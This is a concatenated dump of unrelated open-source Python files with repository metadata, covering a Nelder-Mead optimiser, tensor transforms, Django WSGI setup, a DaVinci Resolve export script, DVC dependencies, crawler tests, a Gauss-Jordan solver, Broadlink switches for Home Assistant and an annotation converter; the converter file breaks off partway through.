self.fun_simplex = np.take(self.fun_simplex, idx, axis=0)
self.simplex = np.take(self.simplex, idx, axis=0)
def check_finished(self):
"""
Updates the 'finished' attribute.
"""
x_dist_max = np.max(la.norm(self.simplex[1:] - self.simplex[0], axis=-1))
self._logger.report(f'Maximum distance value for the simplex: {x_dist_max}')
f_diff_max = np.max(np.abs(self.fun_simplex[1:] - self.fun_simplex[0]))
self._logger.report(f'Maximum function difference: {f_diff_max}')
self.finished = (x_dist_max < self.xtol) and (f_diff_max < self.ftol)
self._logger.report(
f'End of Nelder-Mead iteration {self.num_iter}, max number of iterations: {self.max_iter}.'
)
if not self.finished:
if self.num_iter >= self.max_iter:
self._logger.report('Number of iterations exceeded the maximum. Stop.')
self.exceeded_max_iters = True
self.finished = True
@update_method()
def choose_step(self, outputs):
"""
Method which selects the next step to be performed.
"""
xr, fxr = self._get_single_result(outputs)
self.extra_points = {'xr': (xr, fxr)}
if fxr < self.fun_simplex[0]:
self.next_submit = 'submit_expansion'
else:
if fxr < self.fun_simplex[-2]:
self._update_last(xr, fxr)
self.next_submit = 'new_iter'
else:
if fxr < self.fun_simplex[-1]:
self.next_submit = 'submit_contraction'
else:
self.next_submit = 'submit_inside_contraction'
def _update_last(self, x, f):
self.simplex[-1] = x
self.fun_simplex[-1] = f
@submit_method(next_update='update_expansion')
def submit_expansion(self):
self._logger.report('Submitting expansion step.')
xe = (1 + RHO * CHI) * self.xbar - RHO * CHI * self.simplex[-1]
return [self._to_input_list(xe)]
@update_method(next_submit='new_iter')
def update_expansion(self, outputs):
"""
Retrieve the results of an expansion step.
"""
xe, fxe = self._get_single_result(outputs)
xr, fxr = self.extra_points['xr']
if fxe < fxr:
self._update_last(xe, fxe)
else:
self._update_last(xr, fxr)
@submit_method(next_update='update_contraction')
def submit_contraction(self):
self._logger.report('Submitting contraction step.')
xc = (1 + PSI * RHO) * self.xbar - PSI * RHO * self.simplex[-1]
return [self._to_input_list(xc)]
@update_method()
def update_contraction(self, outputs):
"""
Retrieve the results of a contraction step.
"""
xc, fxc = self._get_single_result(outputs)
_, fxr = self.extra_points['xr']
if fxc < fxr:
self._update_last(xc, fxc)
self.next_submit = 'new_iter'
else:
self.next_submit = 'submit_shrink'
@submit_method(next_update='update_inside_contraction')
def submit_inside_contraction(self):
self._logger.report('Submitting inside contraction step.')
xcc = ((1 - PSI) * self.xbar + PSI * self.simplex[-1])
return [self._to_input_list(xcc)]
@update_method()
def update_inside_contraction(self, outputs):
"""
Retrieve the results of an inside contraction step.
"""
xcc, fxcc = self._get_single_result(outputs)
if fxcc < self.fun_simplex[-1]:
self._update_last(xcc, fxcc)
self.next_submit = 'new_iter'
else:
self.next_submit = 'submit_shrink'
@submit_method(next_update='update_shrink')
def submit_shrink(self): # pylint: disable=missing-function-docstring
self._logger.report('Submitting shrink step.')
self.simplex[1:] = self.simplex[0] + SIGMA * (self.simplex[1:] - self.simplex[0])
self.fun_simplex[1:] = np.nan
return [self._to_input_list(x) for x in self.simplex[1:]]
@update_method(next_submit='new_iter')
def update_shrink(self, outputs):
self.fun_simplex[1:] = self._get_values(outputs)
@property
def _state(self):
state_dict = {
k: v
for k, v in self.__dict__.items()
if k not in ['_result_mapping', '_logger', 'xtol', 'ftol']
}
# Hide inf values before passing on to AiiDA
state_dict['xtol'] = self.xtol if self.xtol < np.inf else None
state_dict['ftol'] = self.ftol if self.ftol < np.inf else None
return state_dict
@property
def is_finished(self):
return self.finished
@property
def is_finished_ok(self):
return self.is_finished and not self.exceeded_max_iters
def _create_inputs(self):
return getattr(self, self.next_submit)()
def _update(self, outputs):
getattr(self, self.next_update)(outputs)
@property
def result_value(self):
value = super().result_value # pylint: disable=no-member
assert value.value == self.fun_simplex[0]
return value
def _get_optimal_result(self):
"""
Return the index and optimization value of the best evaluation process.
"""
cost_values = {
k: get_nested_result(v.output, self.result_key)
for k, v in self._result_mapping.items()
}
opt_index, opt_output = min(cost_values.items(), key=lambda item: item[1].value)
opt_input = self._result_mapping[opt_index].input[self.input_key]
return (opt_index, opt_input, opt_output)
def get_engine_outputs(self):
return {'last_simplex': orm.List(list=self.simplex.tolist()).store()}
class NelderMead(OptimizationEngineWrapper):
"""
Engine to perform the Nelder-Mead (downhill simplex) method.
:param simplex: The current / initial simplex. Must be of shape (N + 1, N), where N is the dimension of the problem.
:type simplex: array
:param fun_simplex: Function values at the simplex positions.
:type fun_simplex: array
:param xtol: Tolerance for the input x.
:type xtol: float
:param ftol: Tolerance for the function value.
:type ftol: float
:param max_iter: Maximum number of iteration steps.
:type max_iter: int
:param input_key: Name of the input argument in the evaluation process.
:type input_key: str
:param result_key: Name of the output argument in the evaluation process.
:type result_key: str
"""
_IMPL_CLASS = _NelderMeadImpl
def __new__( # pylint: disable=arguments-differ,too-many-arguments
cls,
simplex,
fun_simplex=None,
xtol=1e-4,
ftol=1e-4,
max_iter=1000,
input_key='x',
result_key='result',
logger=None
):
return cls._IMPL_CLASS( # pylint: disable=no-member
simplex=simplex,
fun_simplex=fun_simplex,
xtol=xtol,
ftol=ftol,
max_iter=max_iter,
input_key=input_key,
result_key=result_key,
logger=logger
)
| 31.949062
| 120
| 0.623479
|
f7a207469cfd89f2b386f13df1c3672e7985c977
| 1,922
|
py
|
Python
|
essmc2/transforms/tensor.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 69
|
2021-11-01T11:18:13.000Z
|
2022-03-28T04:27:17.000Z
|
essmc2/transforms/tensor.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 6
|
2021-11-01T09:28:13.000Z
|
2022-02-11T09:49:58.000Z
|
essmc2/transforms/tensor.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 16
|
2021-11-11T06:26:18.000Z
|
2022-03-20T13:32:15.000Z
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
import numpy as np
import torch
from .registry import TRANSFORMS
def to_tensor(data):
if isinstance(data, torch.Tensor):
return data
elif isinstance(data, np.ndarray):
return torch.from_numpy(data)
elif isinstance(data, list):
return torch.tensor(data)
elif isinstance(data, int):
return torch.LongTensor([data])
elif isinstance(data, float):
return torch.FloatTensor([data])
else:
raise TypeError(f"Unsupported type {type(data)}")
@TRANSFORMS.register_class()
class ToTensor(object):
def __init__(self, keys):
self.keys = keys
def __call__(self, item):
for key in self.keys:
item[key] = to_tensor(item[key])
return item
@TRANSFORMS.register_class()
class Select(object):
def __init__(self, keys, meta_keys=()):
self.keys = keys
if not isinstance(meta_keys, (list, tuple)):
raise TypeError(f"Expected meta_keys to be list or tuple, got {type(meta_keys)}")
self.meta_keys = meta_keys
def __call__(self, item):
data = {}
for key in self.keys:
data[key] = item[key]
if "meta" in item and len(self.meta_keys) > 0:
data["meta"] = {}
for key in self.meta_keys:
data["meta"][key] = item['meta'][key]
return data
@TRANSFORMS.register_class()
class TensorToGPU(object):
def __init__(self, keys, device_id=None):
self.keys = keys
self.device_id = device_id
def __call__(self, item):
ret = {}
for key, value in item.items():
if key in self.keys and isinstance(value, torch.Tensor) and torch.cuda.is_available():
ret[key] = value.cuda(self.device_id, non_blocking=True)
else:
ret[key] = value
return ret
| 28.264706
| 98
| 0.610822
|
199ad5e8c590edc9e2410f13466eb3b903479da5
| 1,181
|
py
|
Python
|
mysite/wsgi.py
|
wipxj3/EventTicket_v2
|
236bc06c31126f528dad09f61fc0220bf7cf0d42
|
[
"MIT"
] | 2
|
2019-05-17T14:53:27.000Z
|
2021-07-26T19:47:35.000Z
|
mysite/wsgi.py
|
zurawiki/thecrimsom
|
cd185ac936fc3f2de5ebfb2ffff9af52f7a83adb
|
[
"MIT"
] | null | null | null |
mysite/wsgi.py
|
zurawiki/thecrimsom
|
cd185ac936fc3f2de5ebfb2ffff9af52f7a83adb
|
[
"MIT"
] | 1
|
2017-03-21T03:53:31.000Z
|
2017-03-21T03:53:31.000Z
|
"""
WSGI config for mysite project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mysite.settings")
import mysite.startup as startup
startup.run()
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 38.096774
| 79
| 0.806943
|
0c404e798951b43f0454d356795ea619c516ca89
| 1,109
|
py
|
Python
|
drpexport.py
|
Johnr24/DaVinciResolve-ExportProjects
|
db0f8d38d674468722a3786cfacd9ab30cbb0057
|
[
"MIT"
] | null | null | null |
drpexport.py
|
Johnr24/DaVinciResolve-ExportProjects
|
db0f8d38d674468722a3786cfacd9ab30cbb0057
|
[
"MIT"
] | null | null | null |
drpexport.py
|
Johnr24/DaVinciResolve-ExportProjects
|
db0f8d38d674468722a3786cfacd9ab30cbb0057
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# DaVinci Resolve V16 export to DRP all projects in the current folder.
# Copyright 2019 Igor Riđanović, www.metafide.com, www.hdhead.com -
# With tweaks for Python 3.6 John Rogers 2021
#this is the way that readme.txt suggests loading the python module and works for me on my computer
import DaVinciResolveScript as dvr_script
resolve = dvr_script.scriptapp("Resolve")
fusion = resolve.Fusion()
import os #for path functions
def export_drp(p):
projs = pm.GetProjectsInCurrentFolder()
for i in projs.values():
try:
pm.ExportProject(i, os.path.join(p, i))
except TypeError:
print('This script requires DaVinci Resolve 16.')
return None
print( 'Exported', i)
return True
if name == 'main':
# Instantiate Resolve objects
pm = resolve.GetProjectManager()
#sets database name as a new or existing folder name in path
dbn = pm.GetCurrentDatabase()
dbn2 = dbn.get('DbName')
print(dbn2)
# Set the path1 to the DRP export directory
path = ''
path1 = path + dbn2
if export_drp(path1):
print('Export completed.')
| 24.644444
| 99
| 0.713255
|
50222f02926bcad6b80fa0a1227b00b7b0ee84f1
| 1,817
|
py
|
Python
|
dvc/dependency/__init__.py
|
franekp/dvc
|
e380a4a8586da643bf4e0d2281b13aee0d5e5207
|
[
"Apache-2.0"
] | null | null | null |
dvc/dependency/__init__.py
|
franekp/dvc
|
e380a4a8586da643bf4e0d2281b13aee0d5e5207
|
[
"Apache-2.0"
] | null | null | null |
dvc/dependency/__init__.py
|
franekp/dvc
|
e380a4a8586da643bf4e0d2281b13aee0d5e5207
|
[
"Apache-2.0"
] | null | null | null |
import schema
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
from dvc.exceptions import DvcException
from dvc.config import Config
from dvc.dependency.base import DependencyBase
from dvc.dependency.s3 import DependencyS3
from dvc.dependency.gs import DependencyGS
from dvc.dependency.local import DependencyLOCAL
from dvc.dependency.hdfs import DependencyHDFS
from dvc.remote import Remote
from dvc.remote.local import RemoteLOCAL
from dvc.remote.s3 import RemoteS3
from dvc.remote.gs import RemoteGS
from dvc.remote.ssh import RemoteSSH
from dvc.remote.hdfs import RemoteHDFS
DEPS = [DependencyHDFS, DependencyS3, DependencyGS, DependencyLOCAL]
DEP_MAP = {'': DependencyLOCAL,
's3': DependencyS3,
'gs': DependencyGS,
'hdfs': DependencyHDFS,}
SCHEMA = {
DependencyBase.PARAM_PATH: str,
schema.Optional(RemoteLOCAL.PARAM_MD5): schema.Or(str, None),
schema.Optional(RemoteS3.PARAM_ETAG): schema.Or(str, None),
schema.Optional(RemoteHDFS.PARAM_CHECKSUM): schema.Or(str, None),
}
def _get(stage, p, info):
parsed = urlparse(p)
if parsed.scheme == 'remote':
sect = stage.project.config._config[Config.SECTION_REMOTE_FMT.format(parsed.netloc)]
remote = Remote(stage.project, sect)
return DEP_MAP[remote.scheme](stage, p, info, remote=remote)
for d in DEPS:
if d.supported(p):
return d(stage, p, info)
raise DvcException('Dependency \'{}\' is not supported'.format(p))
def loadd_from(stage, d_list):
ret = []
for d in d_list:
p = d.pop(DependencyBase.PARAM_PATH)
ret.append(_get(stage, p, d))
return ret
def loads_from(stage, s_list):
ret = []
for s in s_list:
ret.append(_get(stage, s, {}))
return ret
| 27.953846
| 92
| 0.70721
|
45a854ebe4b3c3978029a7432ce3cbdca0ebaf99
| 1,141
|
py
|
Python
|
Gauss/MetGauss.py
|
IsoT0P0S/Metodo-GaussJordan
|
d135c68254263ff850868715455b813eda5b3596
|
[
"MIT"
] | null | null | null |
Gauss/MetGauss.py
|
IsoT0P0S/Metodo-GaussJordan
|
d135c68254263ff850868715455b813eda5b3596
|
[
"MIT"
] | null | null | null |
Gauss/MetGauss.py
|
IsoT0P0S/Metodo-GaussJordan
|
d135c68254263ff850868715455b813eda5b3596
|
[
"MIT"
] | null | null | null |
import numpy as npm
A = npm.array([[1,2],[1,4]])
B = npm.array([[3],[5]])
AB = npm.concatenate((A,B),axis=1)
AB0 = npm.copy(AB)
tamano = npm.shape(AB)
n = tamano[0]
m = tamano[1]
for i in range(0,n-1,1):
columna = abs(AB[i:,i])
dondemax = npm.argmax(columna)
if (dondemax !=0):
temporal = npm.copy(AB[i,:])
AB[i,:] = AB[dondemax+i,:]
AB[dondemax+i,:] = temporal
AB1 = npm.copy(AB)
for i in range(0,n-1,1):
pivote = AB[i,i]
adelante = i + 1
for k in range(adelante,n,1):
factor = AB[k,i]/pivote
AB[k,:] = AB[k,:] - AB[i,:]*factor
AB2 = npm.copy(AB)
ultfila = n-1
ultcolumna = m-1
for i in range(ultfila,0-1,-1):
pivote = AB[i,i]
atras = i-1
for k in range(atras,0-1,-1):
factor = AB[k,i]/pivote
AB[k,:] = AB[k,:] - AB[i,:]*factor
AB[i,:] = AB[i,:]/AB[i,i]
X = npm.copy(AB[:,ultcolumna])
X = npm.transpose([X])
print('Matriz aumentada:')
print(AB0)
print('Pivoteo parcial por filas')
print(AB1)
print('eliminacion hacia adelante')
print(AB2)
print('eliminación hacia atrás')
print(AB)
print('solución de X: ')
print(X)
| 19.016667
| 42
| 0.561788
|
0f17dff7a84f71db78c1380651775e285c6ad2b2
| 2,948
|
py
|
Python
|
debug-section/already_passing_tests.py
|
tkornuta/python-sandbox
|
00e03cd3f49ebb014611d67aad886aaff04c058f
|
[
"Apache-2.0"
] | null | null | null |
debug-section/already_passing_tests.py
|
tkornuta/python-sandbox
|
00e03cd3f49ebb014611d67aad886aaff04c058f
|
[
"Apache-2.0"
] | null | null | null |
debug-section/already_passing_tests.py
|
tkornuta/python-sandbox
|
00e03cd3f49ebb014611d67aad886aaff04c058f
|
[
"Apache-2.0"
] | 1
|
2020-07-09T05:49:02.000Z
|
2020-07-09T05:49:02.000Z
|
from __future__ import print_function
from webcrawler import WebCrawler
from loggers import *
import html_helper
import unittest
test_case_html = """
<!DOCTYPE html>
<html>
<body>
<h1>Test Case 1</h1>
<p>I am a paragraph! <a href="javascript:doThing">blah</a></p>
<p>Sometimes I am <a href="./cynical.html">overly cynical</a>, but sometimes I am
<a href="./page2.html">overly naïve.</a></p>
</body>
</html>
"""
class HtmlHelperTests(unittest.TestCase):
def test_clean_up_href(self):
self.assertEqual(
html_helper.clean_up_href("http://www.example.com/space url"),
"http://www.example.com/space%20url")
def test_absolutize_path(self):
base_path = '/base/path/'
absolutize_path = html_helper.absolutize_path
self.assertEqual(absolutize_path("/hello", base_path), "/hello")
self.assertEqual(absolutize_path("hello/what", base_path), base_path + "hello/what")
self.assertEqual(absolutize_path("./hello/what", base_path), base_path + "hello/what")
self.assertEqual(absolutize_path("../hello/what", base_path), "/base/hello/what")
self.assertEqual(absolutize_path("../../hello/what", base_path), "/hello/what")
other_base_path = "/base/path"
self.assertEqual(absolutize_path("/hello", other_base_path), "/hello")
self.assertEqual(absolutize_path("hello/what", other_base_path), "/base/hello/what")
self.assertEqual(absolutize_path("./hello/what", other_base_path), "/base/hello/what")
self.assertEqual(absolutize_path("../hello/what", other_base_path), "/hello/what")
def test_get_paths(self):
result = html_helper.get_url_strings_from_doc(test_case_html)
self.assertEqual(result, ["javascript:doThing", "./cynical.html", "./page2.html"])
class CrawlerTests(unittest.TestCase):
def test_crawling(self):
crawler = WebCrawler(100, SilentCrawlerLogger)
crawler.crawl("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/", None, True)
self.assertIn("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2", crawler.graph.nodes)
self.assertIn("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-real", crawler.graph.nodes)
self.assertIn("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-fake", crawler.graph.nodes)
self.assertEqual(crawler.graph.nodes["http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-real"].status, 'success')
self.assertEqual(crawler.graph.nodes["http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-fake"].status_code, 404)
self.assertEqual(crawler.graph.nodes["http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-fake"].status, 'success')
if __name__ == '__main__':
unittest.main()
| 40.944444
| 149
| 0.701493
|
4067d1e535d6543127ba794a7f89e0026e9469d2
| 10,218
|
py
|
Python
|
homeassistant/components/broadlink/switch.py
|
erogleva/core
|
994ae09f69afe772150a698953c0d7386a745de2
|
[
"Apache-2.0"
] | 6
|
2016-11-25T06:36:27.000Z
|
2021-11-16T11:20:23.000Z
|
homeassistant/components/broadlink/switch.py
|
erogleva/core
|
994ae09f69afe772150a698953c0d7386a745de2
|
[
"Apache-2.0"
] | 52
|
2020-07-14T14:12:26.000Z
|
2022-03-31T06:24:02.000Z
|
homeassistant/components/broadlink/switch.py
|
erogleva/core
|
994ae09f69afe772150a698953c0d7386a745de2
|
[
"Apache-2.0"
] | 2
|
2017-09-03T16:06:02.000Z
|
2021-01-12T15:07:52.000Z
|
"""Support for Broadlink switches."""
from abc import ABC, abstractmethod
import logging
from broadlink.exceptions import BroadlinkException
import voluptuous as vol
from homeassistant.components.switch import (
DEVICE_CLASS_OUTLET,
DEVICE_CLASS_SWITCH,
PLATFORM_SCHEMA,
SwitchEntity,
)
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_FRIENDLY_NAME,
CONF_HOST,
CONF_MAC,
CONF_NAME,
CONF_SWITCHES,
CONF_TIMEOUT,
CONF_TYPE,
STATE_ON,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
from .const import DOMAIN, SWITCH_DOMAIN
from .helpers import data_packet, import_device, mac_address
_LOGGER = logging.getLogger(__name__)
CONF_SLOTS = "slots"
SWITCH_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_COMMAND_OFF): data_packet,
vol.Optional(CONF_COMMAND_ON): data_packet,
}
)
OLD_SWITCH_SCHEMA = vol.Schema(
{
vol.Optional(CONF_COMMAND_OFF): data_packet,
vol.Optional(CONF_COMMAND_ON): data_packet,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
}
)
PLATFORM_SCHEMA = vol.All(
cv.deprecated(CONF_HOST),
cv.deprecated(CONF_SLOTS),
cv.deprecated(CONF_TIMEOUT),
cv.deprecated(CONF_TYPE),
PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_MAC): mac_address,
vol.Optional(CONF_HOST): cv.string,
vol.Optional(CONF_SWITCHES, default=[]): vol.Any(
cv.schema_with_slug_keys(OLD_SWITCH_SCHEMA),
vol.All(cv.ensure_list, [SWITCH_SCHEMA]),
),
}
),
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Import the device and set up custom switches.
This is for backward compatibility.
Do not use this method.
"""
mac_addr = config[CONF_MAC]
host = config.get(CONF_HOST)
switches = config.get(CONF_SWITCHES)
if not isinstance(switches, list):
switches = [
{CONF_NAME: switch.pop(CONF_FRIENDLY_NAME, name), **switch}
for name, switch in switches.items()
]
_LOGGER.warning(
"Your configuration for the switch platform is deprecated. "
"Please refer to the Broadlink documentation to catch up"
)
if switches:
platform_data = hass.data[DOMAIN].platforms.setdefault(SWITCH_DOMAIN, {})
platform_data.setdefault(mac_addr, []).extend(switches)
else:
_LOGGER.warning(
"The switch platform is deprecated, except for custom IR/RF "
"switches. Please refer to the Broadlink documentation to "
"catch up"
)
if host:
import_device(hass, host)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Broadlink switch."""
device = hass.data[DOMAIN].devices[config_entry.entry_id]
if device.api.type in {"RM2", "RM4"}:
platform_data = hass.data[DOMAIN].platforms.get(SWITCH_DOMAIN, {})
user_defined_switches = platform_data.get(device.api.mac, {})
switches = [
BroadlinkRMSwitch(device, config) for config in user_defined_switches
]
elif device.api.type == "SP1":
switches = [BroadlinkSP1Switch(device)]
elif device.api.type == "SP2":
switches = [BroadlinkSP2Switch(device)]
elif device.api.type == "MP1":
switches = [BroadlinkMP1Slot(device, slot) for slot in range(1, 5)]
async_add_entities(switches)
class BroadlinkSwitch(SwitchEntity, RestoreEntity, ABC):
"""Representation of a Broadlink switch."""
def __init__(self, device, command_on, command_off):
"""Initialize the switch."""
self._device = device
self._command_on = command_on
self._command_off = command_off
self._coordinator = device.update_manager.coordinator
self._device_class = None
self._state = None
@property
def name(self):
"""Return the name of the switch."""
return f"{self._device.name} Switch"
@property
def assumed_state(self):
"""Return True if unable to access real state of the switch."""
return True
@property
def available(self):
"""Return True if the switch is available."""
return self._device.update_manager.available
@property
def is_on(self):
"""Return True if the switch is on."""
return self._state
@property
def should_poll(self):
"""Return True if the switch has to be polled for state."""
return False
@property
def device_class(self):
"""Return device class."""
return self._device_class
@property
def device_info(self):
"""Return device info."""
return {
"identifiers": {(DOMAIN, self._device.unique_id)},
"manufacturer": self._device.api.manufacturer,
"model": self._device.api.model,
"name": self._device.name,
"sw_version": self._device.fw_version,
}
@callback
def update_data(self):
"""Update data."""
self.async_write_ha_state()
async def async_added_to_hass(self):
"""Call when the switch is added to hass."""
if self._state is None:
state = await self.async_get_last_state()
self._state = state is not None and state.state == STATE_ON
self.async_on_remove(self._coordinator.async_add_listener(self.update_data))
async def async_update(self):
"""Update the switch."""
await self._coordinator.async_request_refresh()
async def async_turn_on(self, **kwargs):
"""Turn on the switch."""
if await self._async_send_packet(self._command_on):
self._state = True
self.async_write_ha_state()
async def async_turn_off(self, **kwargs):
"""Turn off the switch."""
if await self._async_send_packet(self._command_off):
self._state = False
self.async_write_ha_state()
@abstractmethod
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
class BroadlinkRMSwitch(BroadlinkSwitch):
"""Representation of a Broadlink RM switch."""
def __init__(self, device, config):
"""Initialize the switch."""
super().__init__(
device, config.get(CONF_COMMAND_ON), config.get(CONF_COMMAND_OFF)
)
self._name = config[CONF_NAME]
@property
def name(self):
"""Return the name of the switch."""
return self._name
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
if packet is None:
return True
try:
await self._device.async_request(self._device.api.send_data, packet)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
class BroadlinkSP1Switch(BroadlinkSwitch):
"""Representation of a Broadlink SP1 switch."""
def __init__(self, device):
"""Initialize the switch."""
super().__init__(device, 1, 0)
self._device_class = DEVICE_CLASS_OUTLET
@property
def unique_id(self):
"""Return the unique id of the switch."""
return self._device.unique_id
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
try:
await self._device.async_request(self._device.api.set_power, packet)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
class BroadlinkSP2Switch(BroadlinkSP1Switch):
"""Representation of a Broadlink SP2 switch."""
def __init__(self, device, *args, **kwargs):
"""Initialize the switch."""
super().__init__(device, *args, **kwargs)
self._state = self._coordinator.data["state"]
self._load_power = self._coordinator.data["load_power"]
if device.api.model == "SC1":
self._device_class = DEVICE_CLASS_SWITCH
@property
def assumed_state(self):
"""Return True if unable to access real state of the switch."""
return False
@property
def current_power_w(self):
"""Return the current power usage in Watt."""
return self._load_power
@callback
def update_data(self):
"""Update data."""
if self._coordinator.last_update_success:
self._state = self._coordinator.data["state"]
self._load_power = self._coordinator.data["load_power"]
self.async_write_ha_state()
class BroadlinkMP1Slot(BroadlinkSwitch):
"""Representation of a Broadlink MP1 slot."""
def __init__(self, device, slot):
"""Initialize the switch."""
super().__init__(device, 1, 0)
self._slot = slot
self._state = self._coordinator.data[f"s{slot}"]
self._device_class = DEVICE_CLASS_OUTLET
@property
def unique_id(self):
"""Return the unique id of the slot."""
return f"{self._device.unique_id}-s{self._slot}"
@property
def name(self):
"""Return the name of the switch."""
return f"{self._device.name} S{self._slot}"
@property
def assumed_state(self):
"""Return True if unable to access real state of the switch."""
return False
@callback
def update_data(self):
"""Update data."""
if self._coordinator.last_update_success:
self._state = self._coordinator.data[f"s{self._slot}"]
self.async_write_ha_state()
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
try:
await self._device.async_request(
self._device.api.set_power, self._slot, packet
)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
| 30.141593
| 86
| 0.637698
|
d19a93e9cd58cd77060618c6ee2657e55c558c26
| 5,959
|
py
|
Python
|
ImgAnn/convert.py
|
nipdep/img-ann
|
a144136de981dc3dc28f4ed5c206ca9e195ad274
|
[
"MIT"
] | 2
|
2021-01-14T11:23:52.000Z
|
2021-08-30T03:15:20.000Z
|
ImgAnn/convert.py
|
nipdep/img-ann
|
a144136de981dc3dc28f4ed5c206ca9e195ad274
|
[
"MIT"
] | 4
|
2020-12-16T16:48:56.000Z
|
2021-07-01T02:48:07.000Z
|
ImgAnn/convert.py
|
nipdep/img-ann
|
a144136de981dc3dc28f4ed5c206ca9e195ad274
|
[
"MIT"
] | 1
|
2021-07-01T01:07:28.000Z
|
2021-07-01T01:07:28.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from .operators.imgdata import ImgData
from .operators import coco, csv, pascalvoc
import logging
import os
# set logger
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class Convertor:
""" convert method implementation class """
@classmethod
def coco2csv(cls, dataset_dir: str,
coco_ann_dir: str,
save_dir: str):
""" convert coco to csv
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param coco_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imgdataset = ImgData.extract(dataset_dir)
coco_obj = coco.COCO(imgdataset.dataset)
coco_obj.extract(coco_ann_dir)
df = coco_obj.get_dataset()
ann, clas = coco_obj.get_annotations()
csv_obj = csv.CSV(df)
csv_obj.set_annotations(ann)
csv_obj.set_classes(clas)
csv_fomatted = csv_obj.translate()
csv_obj.archive(save_dir, csv_fomatted)
@staticmethod
def coco2voc(dataset_dir: str,
coco_ann_dir: str,
save_dir: str):
""" convert coco to pascal VOC
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param coco_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
if not os.path.exists(save_dir):
os.makedirs(save_dir)
imgdataset = ImgData.extract(dataset_dir)
coco_obj = coco.COCO(imgdataset.dataset)
coco_obj.extract(coco_ann_dir)
df = coco_obj.get_dataset()
ann, cls = coco_obj.get_annotations()
voc_obj = pascalvoc.PascalVOC(df)
voc_obj.set_annotations(ann)
voc_obj.set_classes(cls)
for xml, name in voc_obj.translate():
file_dir = save_dir + '/' + name.split('.')[0]+'.xml'
voc_obj.archive(file_dir, xml)
@staticmethod
def csv2coco(dataset_dir: str,
csv_ann_dir: str,
save_dir: str):
""" convert .csv into coco
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param csv_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imagedataset = ImgData.extract(dataset_dir)
csv_obj = csv.CSV(imagedataset.dataset)
csv_obj.extract(csv_ann_dir)
df = csv_obj.get_dataset()
ann, cls = csv_obj.get_annotations()
coco_obj = coco.COCO(df)
coco_obj.set_annotations(ann)
coco_obj.set_classes(cls)
data = coco_obj.translate()
coco_obj.archive(save_dir, data)
@staticmethod
def csv2voc(dataset_dir: str,
csv_ann_dir: str,
save_dir: str):
""" convert .csv into pascal VOC
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param csv_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
if not os.path.exists(save_dir):
os.makedirs(save_dir)
imagedataset = ImgData.extract(dataset_dir)
csv_obj = csv.CSV(imagedataset.dataset)
csv_obj.extract(csv_ann_dir)
df = csv_obj.get_dataset()
ann, cls = csv_obj.get_annotations()
voc_obj = pascalvoc.PascalVOC(df)
voc_obj.set_annotations(ann)
voc_obj.set_classes(cls)
for xml, name in voc_obj.translate():
file_dir = save_dir + '/' + name.split('.')[0]+'.xml'
voc_obj.archive(file_dir, xml)
@staticmethod
def voc2coco(dataset_dir: str,
voc_ann_dir: str,
save_dir: str):
""" convert pascal VOC into coco
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param voc_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imagedataset = ImgData.extract(dataset_dir)
